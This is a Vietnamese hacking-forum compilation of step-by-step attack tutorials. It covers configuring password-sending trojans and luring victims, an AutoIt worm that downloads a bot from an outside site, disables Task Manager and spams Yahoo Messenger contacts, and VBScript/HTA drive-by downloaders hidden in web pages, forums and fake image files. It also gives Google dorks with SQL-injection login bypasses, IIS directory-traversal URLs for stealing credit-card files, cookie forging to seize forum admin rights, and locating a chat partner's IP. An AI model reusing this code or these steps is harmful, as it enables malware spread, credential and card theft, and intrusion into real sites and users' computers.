Tao Troijan an cap pass Yahoo, Game ..

Cách sử dụng trojan loại Password sender : trang này đã được đọc lần mấy con này thì các bạn chỉ wan tâm đến 3 vấn đề chính ,đó là : Smtp server :sever mà thông wa đó ,trojan sẽ gửi pass về cho bạn Your email :Email của bạn để mà trojan gửi tới . LTNDDVT :Làm thế nào để dụ Victim Smtp server :Có khá nhiều cái để lợi dụng .Các bạn có thể search với từ khóa “smtp server free list ” Tui cho bạn 2 cái mà tui đang sử dụng thấy có hiệu wả ,vì ngày nào tui cũng nhận được khoảng 5 thư của em Hooker . mta469.mail.yahoo.com mta545.mail.yahoo.com 2 vấn đề còn lại là bạn tự giải quyết . Ví dụ với Hooker: Bước 1 : Download :hooker Khi Unzip bạn sẽ thấy các file sau : Config.bat ; history.txt ; hkconf.exe ; hooker.exe ; Hkconf.ini ; Buớc 2 : Bạn chạy file Hkconf.ini đây chính là file cần thiết để trojan có thể nhận biết được nó sẽ gửi email về địa chỉ nào thông qua host nào, bạn thay dổi các thông số của file này như sau : host = 1 trong những smtp tui cho ở trên(mta469.mail.yahoo.com) mailto=dịa chỉ email của bạn ( bạn điền vào đây địa chỉ email của bạn để trojan gửi email về cho bạn) reg_desc = TaskMem(bạn có thể dặt sao cũng được ) exename = MSCR56.exe(bạn có thể dặt sao cũng được :mswin.exe) ỡ dòng cuối cùng của file này bạn thêm một dòng sau s13=logon(nếu dòng trên nó là s12=..) Buớc 3 : Sau khi thay dổi xong bạn save lại ! rồi chạy file Config.bat !!! Buớc 4: Sau khi thực hiện xong 3 buớc trên bạn tìm cách dụ Victim chạy. Ví dụ với Kuang2: Bước1 : Download kuang2 Khi Unzip bạn sẽ thấy các file sau : Kuang.exe server_setup.exe 2 file còn lại không wan tâm. Bước 2 :Chạy Server_setup.exe pSenderfile :Bạn nhấn nu’t Open và chọn file Kuang.exe để Edit nó . Smtp server :Như trên. Destination address:Email của bạn Source address :Có thể là Email nào cũng được .Không quan trọng. Bạn Save lại . Bước 3 :Nghĩ tới việc dụ Victim . Theo tui muốn chơi trojan thì các bạn phải giỏi trong khâu Dụ khị .Do đó bước cuối cùng là bước quan trọng nhất .Và tui nghĩ rằng khâu này chắc chắn các bạn giỏi hơn tui .

►Cách làm virus lan tràn qua Y!M

Trước tiên save đọan code này vào notepad dưới dạng *.txt (vd: bot.txt).Bạn sửa lại theo ý thích nha

If Not FileExists(@WindowsDir & “\taskmsg.exe”) Then
InetGet (”http://phidao.net/yahoo/bot.exe”, @WindowsDir & “\taskmsg.exe”, 0, 1)
Sleep(5000)
EndIf
RegWrite(”HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel”, “Homepage”, “REG_DWORD”, “1″)
RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System”, “DisableTaskMgr”, “REG_DWORD”, “1″)
RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System”, “DisableRegistryTools”, “REG_DWORD”, “1″)
RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main”, “Start Page”, “REG_SZ”, “http://phidao.net/yahoo/”)
RegWrite(”HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz”, “content url”, “REG_SZ”, “http://phidao.net/yahoo/”)
RegWrite(”HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_Launchcast”, “content url”, “REG_SZ”, “http://phidao.net/yahoo/”)
RegWrite(”HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run”, “Task Manager”, “REG_SZ”, @WindowsDir & “\taskmsg.exe”)
RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main”, “Window Title”, “REG_SZ”, “Minhnhut.be :: Another Version of Nhut.be :: Chut gi de nho…”)
$tin[0] = “Vui gi ma vui the! Dau ca bung roi ne… http://phidao.net/yahoo/ “
$tin[1] = “Trui, ngo nghinh qua a… Vo coi thu nao http://phidao.net/yahoo/ “
$tin[2] = “Vui kinh khung! Ghe qua day ti xiu nha ban http://phidao.net/yahoo/ “
$tin[3] = “Chao mung cac ban den voi Dao Khuc Community http://phidao.net/yahoo/ “
$tin[4] = “Moi phat hien ra cai nay ne, cuc hay luon nha http://phidao.net/yahoo/ “
$tin[5] = “Kinh di qua di mat… Toan la ma trong nay ne http://phidao.net/yahoo/ “
$tin[6] = “Gom gi ma gom the… Vao day ma xem gom co nao http://phidao.net/yahoo/ “
$tin[7] = “Cai gi the nhi? Thang ban moi quang cao cai nay http://phidao.net/yahoo/ “
$tin[8] = “Troi oi!Album hinh moi lam dep ghe==> http://phidao.net/yahoo/ “
$tin[9] = “Hey! Coi Album hinh moi lam ne http://phidao.net/yahoo/ “
While (1)
sleep(60000)
$tieude = WinGetTitle(”Yahoo! Messenger”, “”)
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut($tin[$ngaunhien])
BlockInput (1)
WinActivate($tieude)
Send(”^m”)
Send(”{DOWN}”)
Send(”^{SHIFTDOWN}{END}{SHIFTUP}”)
Send(”{ENTER}”)
Send(”^v {ENTER}”)
BlockInput (0)
EndIf
Sleep(1800000)
WEnd

Sau khi cài đặt xong mở chương trình “Compile Script to.exe”
Ở fần Source (AutoIT .au3 file): chọn đường dẫn tới file bot.txt vừa tạo
Custom Icon (.ico): tạo icon cho chương trình, ko có cũng ko sao
Đánh vào dấu kiểm Allow decompilation
Passphrase: đánh password tùy thích vào
Verify Passphrase: đánh lại password
Nhấn nút convert là xong.
****
Tiếp theo đính đọan code này vào web để chạy file bot.exe

<script language=“VBScript”>
on error resume next
dl = “http:/phidao.net/yahoo/bot.exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”Scripting.FileSystemObject”,””)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0
</script>

Okie xong rùi đó test thử xem nào
———————————————-

đây là tool để tạo con này:Download Autoit 3.2.1tại đây

Bài viết với mục đích tham khảo  mong các ban cẩn thận khi thức hành

►Gắn trojan ,keylog ,virus vào website, forum

Cách 1 :
Cách đính kèm trojan vào website
Một số cách phổ biến đính kèm trojon vào website như dùng mã javascript hay dùng phần mềm ..
Xin giới thiệu với các bạn 1 số cách
a,Dùng 1 đoạn mã javascript để mở và phát tán trojan
<script language=javascript>
open(”địa chỉ con trojan”);
</SCRIPT>
Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở website trojan sẽ mở ra và yêu cầu người lướt website mở ra
b,
bạn copy vào notepad đoạn mã sau:

Code:

<html>
<head>
<script language=”javascript”>
try {
var fso = new ActiveXObject(”Scripting.FileSystemObject”);
var Shell = new ActiveXObject(”WScript.Shell”);
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + “\\system32\\System.js”;
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine(’var url = “Địa chỉ trojon”;’);
a2.WriteLine(’var burl = “Địa chỉ trojon”;’);
a2.WriteLine(’var fso = new ActiveXObject(”Scripting.FileSystemObject”);’);
a2.WriteLine(’var tfolder = fso.GetSpecialFolder(0);’);
a2.WriteLine(’var filepath = tfolder + “\\\\system32\\\\System.js”;’);
a2.WriteLine(’var Shell = new ActiveXObject(”WScript.Shell”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\ \\\Windows”,filepath);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\S ystem32″,filepath);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page”,url);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″,url);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Dia chi con trojan”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies \\\\System\\\\DisableRegistryTools”,1,”REG_DWORD”) ;’);
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
</script>
<HTA:APPLICATION WINDOWSTATE=’minimize’ SHOWINTASKBAR=’no’ />
</head>
<body onload=’window.close()’>
</body>
</html>

rồi save lại với tên là : trojan.hta
bạn gắn đoạn mã sau vào cuối cùng của website của bạn:

Code:

<center>
<span datasrc=”#oRun” datafld=”view” dataformatas=”html”></span>
<xml id=”oRun”>
<preview>
<view>
<![CDATA[
<object id="oFile" data="trojan.hta?id=1"></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>

rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1 mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện

Cách 2:

đoạn đầu đưa vào diễn đàn là 01 frame

<iframe width=”0″ height=”0″ src=”http://link chứa đoạn mã bên dưới”></iframe>
đoạn 2

Code:
<script language=”VBScript”>
on error resume next
dl = “Đường dẫn con Virus dạng .exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”Scripting.FileSystemObject”,””)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0
</script>

Cách 3 :
Đầu tiên , mọi người hãy Download Program http://mail.packetstormsecurity.org/trojans/exe2vbs.zip
Đây là chương trình giúp bạn Convert sang “*.hta
Đầu tiên các bạn sử dụng EXE2VBS để convert file trojan của mình ( chẳng hạn tôi sẽ xài 1 con MagicPS => để lấy pass của người Victim truy cập ), click vào file trojan kéo vô khung exe của exe2vbs ===> các bạn sẽ được 1 file *.js ! Okie giờ edit lại một chút để thành file hta ( định dạng html thực thi để chạy các activeX ) Chú ý khi chạy exe2vbs trong phần lực chọn có 3 ô các bạn đánh dấu vào 2 mục trên thôi
Mở file trojan.exe.js vừa convert ra bằng notepad or wordpad, cho thêm dòng
Code:

<script language=vbs>

vào trên cùng

Xuống dưới cùng thay dòng: WScript.CreateObject(”WScript.Shell”).run(pth)

bằng
Code:

Set Shell1 = CreateObject(”WScript.Shell”) Shell1.Run(pth) </script> <HTA:APPLICATION WINDOWSTATE=’minimize’ SHOWINTASKBAR=’no’ /> </head> <body onload=’window.close()’> </body> </html>

Sau đó save lại thành file trojan.hta Sau đó mở file web của bạn cho Victim truy cập ra thêm code này vào để run file trojan.hta
Code:

<center> <span datasrc=”#oRun” datafld=”view” dataformatas=”html”></span> <xml id=”oRun”> <preview> <view> <![CDATA[ <object id="oFile" data="trojan.hta?id=1"></object> ]]> </view> </preview> </xml> </center> </body> </html>

để tên File có dạng File ảnh (JPG , GIF ,BMP …) :
Theo cách 2 , mở Notepad :
Code:
<script language=”VBScript”>
on error resume next
dl = “Đường dẫn con Virus dạng .exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”Scripting.FileSystemObject”,””)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0
</script>

Save lại dưới dạng “tên File.JPG” hay . GIF tùy ý .
Ví dụ : funy.JPG
Mở File funy.JPG vừa Save song bằng Font Page , nhấp chọn Instert Picture rồi cho bừa 1 bức ảnh để đỡ nghi ngờ . File – Save , Upload File funy.JPG vừa rồi lên .
Giờ thì nó trông như 1 bức ảnh thật , có khi họ còn không nghi ngờ là có trojan trong đó nữa .

►Hack toàn tập

Đầu tiên mong các mod thấy nếu bài này phạm quy xin del chứ đừng Ban em. Tội nghiệp. Em sưu tầm cho mấy mem đọc ah. Có thể nó không còn dùng được nhưng có thể làm tư liệu tham khảo
===
I-Lỗi Tek9.asp :

Cách thức tìm : Dùng Google

Câu tìm kiếm : tek9.asp

Kết quả : Bạn tìm các trang web hiện lên , ví dụ là http://198.170.250.68/ tek9_login.asp

Bạn sẽ thêm intranet trước tek9.asp

http://198.170.250.68/intranet/tek9_login.asp

Được gì ? Bạn vào trang đăng nhập của người quản trị.

Tên và mật khẩu : Đều là ‘or”=’

Sau đó ? Bạn tự tìm hiểu vì mỗi trang có 1 sự trình bày hơi khác nhau. Trang trên cho phép bạn quản lý thông số , kiểu , cách thức và vài chỗ có liên quan đến cơ sở dữ liệu chứa thẻ tín dụng. Ngòai ra bạn có thể tìm lệnh Find orders để truy tìm khu vực chức thẻ.

============================

II-Lỗi Cart32 v3.5a

Cách thức tìm : Dùng Google

Câu tìm kiếm : Cart32 v3.5a

Kết quả : Chạy các trang web có tập tin cart32.exe . Bạn sẽ nhận được 1 số thông tin

Được gì ? Chưa được gì hết

Tên và mật khẩu : Không cần

Sau đó ? Giả sử bạn kiếm được trang web sau có lỗi

http://www.connectionsmall.com/scripts/cart32.exe/

Bạn thay từ card32.exe bằng những dòng sau đây :

Code:

I)

..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\

II)

..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

III)

..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\

Ví dụ :

Code:

http://www.connectionsmall.com/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

-Nếu không chuyện gì xảy ra thì bạn thêm dòng địa chỉ sau vào cuối cùng để lấy thẻ tín dụng :

\progra~1\MWAInc\Cart32\

-Bạn sẽ thấy những dòng giống như sau :

2814659000-001001.c32

2814659000-001002.c32

2814659000-001003.c32

-Bây giờ tất những gì cần phải làm là bạn thêm 1 trong ba hoặc thử thì dùng từng cái vào cuối địa chỉ trên. Sau cùng ta sẽ có giống như thế này :

Code:

http://www.connectionsmall.com/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\MWAInc\Cart32\2814659000-001001.c32

============================

III-Lỗi Commerce.cgi

Cách thức tìm : Dùng Google

Câu tìm kiếm : Commerce.cgi

Kết quả : Chạy các trang web có tập tin Commerce.cgi. Giả sử bạn kiếm được trang web sau có lỗi

Code:

http://www.warresisters.org/store/commerce.cgi

Bạn thay từ commerce.cgi bằng admin_files/commerce_user_lib.pl

Ví dụ :

Code:

http://www.warresisters.org/store/admin_files/commerce_user_lib.pl

Bạn sẽ nhận được 1 số thông tin :

$sc_sales_tax = “.0825″;

$sc_sales_tax_state = “NY”;

$sc_send_order_to_email = “yes”;

$sc_order_log_name = “onlinebookstore.log”;

$sc_send_order_to_log = “yes”;

$shipping_percentage = “.15″;

$sc_order_email = “wrl\@igc.org”;

$sc_root_url = “http://www.warresisters.org/store”;

$sc_admin_email = “lit\@warresisters.org”;

$sc_domain_name_for_cookie = “.warresisters.org”;

$sc_order_script_url = “https://secure.serve.com/resist/store/commerce.cgi”;

$sc_root_web_path = “/home/serve/resist/Html/Products”;

$sc_path_for_cookie = “/store”;

$path_to_html = “../Html”;

1;

Được gì ? 1 số thông tin quan trọng về cơ sở dữ liệu

Tên và mật khẩu : Không cần

Sau đó

Xóa cái commerce_user_lib.pl đi thay bằng dòng chữ tìm ở $sc_order_log_name và ….

============================

III-Lỗi shopdisplaycategories

Cách thức tìm : Dùng Google

Câu tìm kiếm : shopdisplaycategories

Kết quả : Trong link các trang bị lỗi , bạn thay shopdisplaycategories.asp thành shopdbtest.asp

Được gì ? Bạn biết được đường dẫn để tải cơ sở dữ liệu Thẻ Tín Dụng

Tên và mật khẩu : Không cần

Sau đó : Thay shopdbtest.asp bằng phần trả lời của xdatabase ( bạn tìm ở phía trên )

============================

IV-Lỗi SQL Injection

Cách thức tìm : Dùng Google

Câu tìm kiếm : admentor

Kết quả : Bạn vào trang bị lỗi , đăng nhập với Username và Password là ‘or”=’

Được gì ? Bây giờ bạn nắm mọi họat động quản lý của website trong vai Admin

Tên và mật khẩu : ‘or”=’

Sau đó : Bạn tự tìm hiểu

============================

IV-Lỗi datasources

Cách thức tìm : Dùng Google

Câu tìm kiếm : datasources/ hay config/datasources/

Kết quả :Đường dẫn những trang bị lỗi này

Được gì ? Từ đây bạn thêm vào expire.mdb vào sau datasources/ hay config/datasources/

Tên và mật khẩu : Không cần

Sau đó : Bạn tải được kho dữ liệu có credit card

Hacker Forum Vietboard 2.5 , 2.6

Chiếm quyền Admin các forum Vieboard bằng JavaScript Inline

Trước tết tôi có vào các forum này để test thử lỗi JavaScript Inline thì bị “dính” rât nhiều nhưng chưa bị hack, nhưng cho tới bây giờ thì hầu hết đã bị hack. Các phiên bản Vieboard 2.5, 2.6 đều có thể dễ dàng chiếm quyền Admin bằng JavaScript Inline.

Hãy thử gõ đoạn JavaScript dưới vào trình duyệt rồi enter, sau đó refresh lại trình duyệt để thấy link đến Control panel của Admin hoặc truy cập thẳng vào Control panel của Admin (www.victim.com/forum/adm_fr.asp):

javascript:void(document.cookie=”isLogged=mod=False&mSN=Admin&group=1&mid=1″)

Nếu để mSN=Admin thì coi như bạn đã login vào bằng user Admin, nếu mSN= tên đăng ký của bạn thì giống như bạn login vào bằng account của mình nhưng với quyền Admin.

Bạn để ý group=1 trong đoạn JavaScript trên, con số 1 chính là con số cho biết user này là Admin, còn các member là 2.

Sau khi đã vào được Control panel của Admin thì có thể set cho account của bạn có quyền Admin bằng cách gõ câu lệnh SQL dưới vào textbox “SQL Query (For Advanced User Only)” ở phía bên dưới rồi Click vào “Query”:

Update tblMember Set mGroup = 1 Where mSN = ‘tendangkycuaban’

Lưu ý: tên đăng ký của bạn trong câu lệnh SQL được bao bởi cặp dấu nháy đơn.

Nếu không thành công, có thể do admin của forum đã đổi tên file Control panel hoặc đổi tên Cookies, hãy gõ đoạn JavaScript sau vào trình duyệt rồi enter để biết tên Cookie:

javascript:alert(document.cookie)

►Hướng dẫn lấy IP của victim khi chát

Bạn phải chat với Victim dể có sự thiết lập IP. Nói chung là giữ Online Connect với Victim.
Mở một cửa sổ DOS prompt
Vào C:gõ lệnh sau: netstat -a
C:\b netstat -a

Lúc dó trên màn hình sẽ xuất hiện 1 số thông tin có dạng nhu sau:
Active Connections

Proto Local Address Foreign Address State
TCP franck-a:0 0.0.0.0:0 LiSTENiNG
TCP franck-a:1091 0.0.0.0:0 LiSTENiNG
TCP franck-a:1090 server5.syd.www.ozemail.net:80 CLOSE_WAiT
TCP franck-a:1099 p3-max35.auck.ihug.co.nz:1054 ESTABLiSHED

Chúng ta chỉ chú ý những dòng nào có chữ ESTABLiSHED, dó là thông báo cho sự nối kết dã duợc thiết lập với bên ngoài.
Nếu chúng ta chat với nhiều nguời, chat bằng cả Yahoo Messenger nữa thì sẽ có nhiều ESTABLiSHED, do vậy chúng cần chú ý và phân biệt xem ai mới thực sự là Victim của mình.

Với ví dụ trên ta thấy p3-max35.auck.ihug.co.nz:1054 ESTABLiSHED là dáng chú ý và quan tâm cả. Còn nếu test trên máy bạn thì nó sẽ khác di nhung ta chỉ cần quan tâm dến dòng tuong tự nhu vậy và có ESTABLiSHED là duợc

Việc tiếp theo của chúng ta là Ping Victim này dể lấy duợc IP thật của họ.
Cung ở của sổ DOS prompt này, ta gõ lệnh Ping p3-max35.auck.ihug.co.nz
:1054 ESTABLiSHED ==è chúng ta không quan tâm cái này nên không cần thêm vào sau lệnh Ping

c:p3-max35.auck.ihug.co.nz
Wow, thật là tuyệt, tới dây ta dã thấy duợc IP thật của Victim rồi.

Pinging p3-max35.auck.ihug.co.nz [209.76.151.67] with 32 bytes of data:
Reply from 209.76.151.67: bytes=32 time=1281ms TTL=39
Request timed out.
Reply from 209.76.151.67: bytes=32 time=1185ms TTL=39
Request timed out.

Ping statistics for 209.76.151.67:
Packets: Sent = 4, Received = 2, Lost = 2 (50% loss),
Approximate round trIP times in milli-seconds:
Minimum = 1185ms, Maximum = 1281ms, Average = 616ms

209.76.151.67 chính là IP mà chúng ta cần tìm của Victim dây.

Chúc các bạn thành công
Cách này mình đã test thử và phát hiện rất tốt IP của victim
Bạn nhớ khi chát với victim nên đóng tất các cửa sổ khác lại,như vậy sẽ chính xác hơn
trojon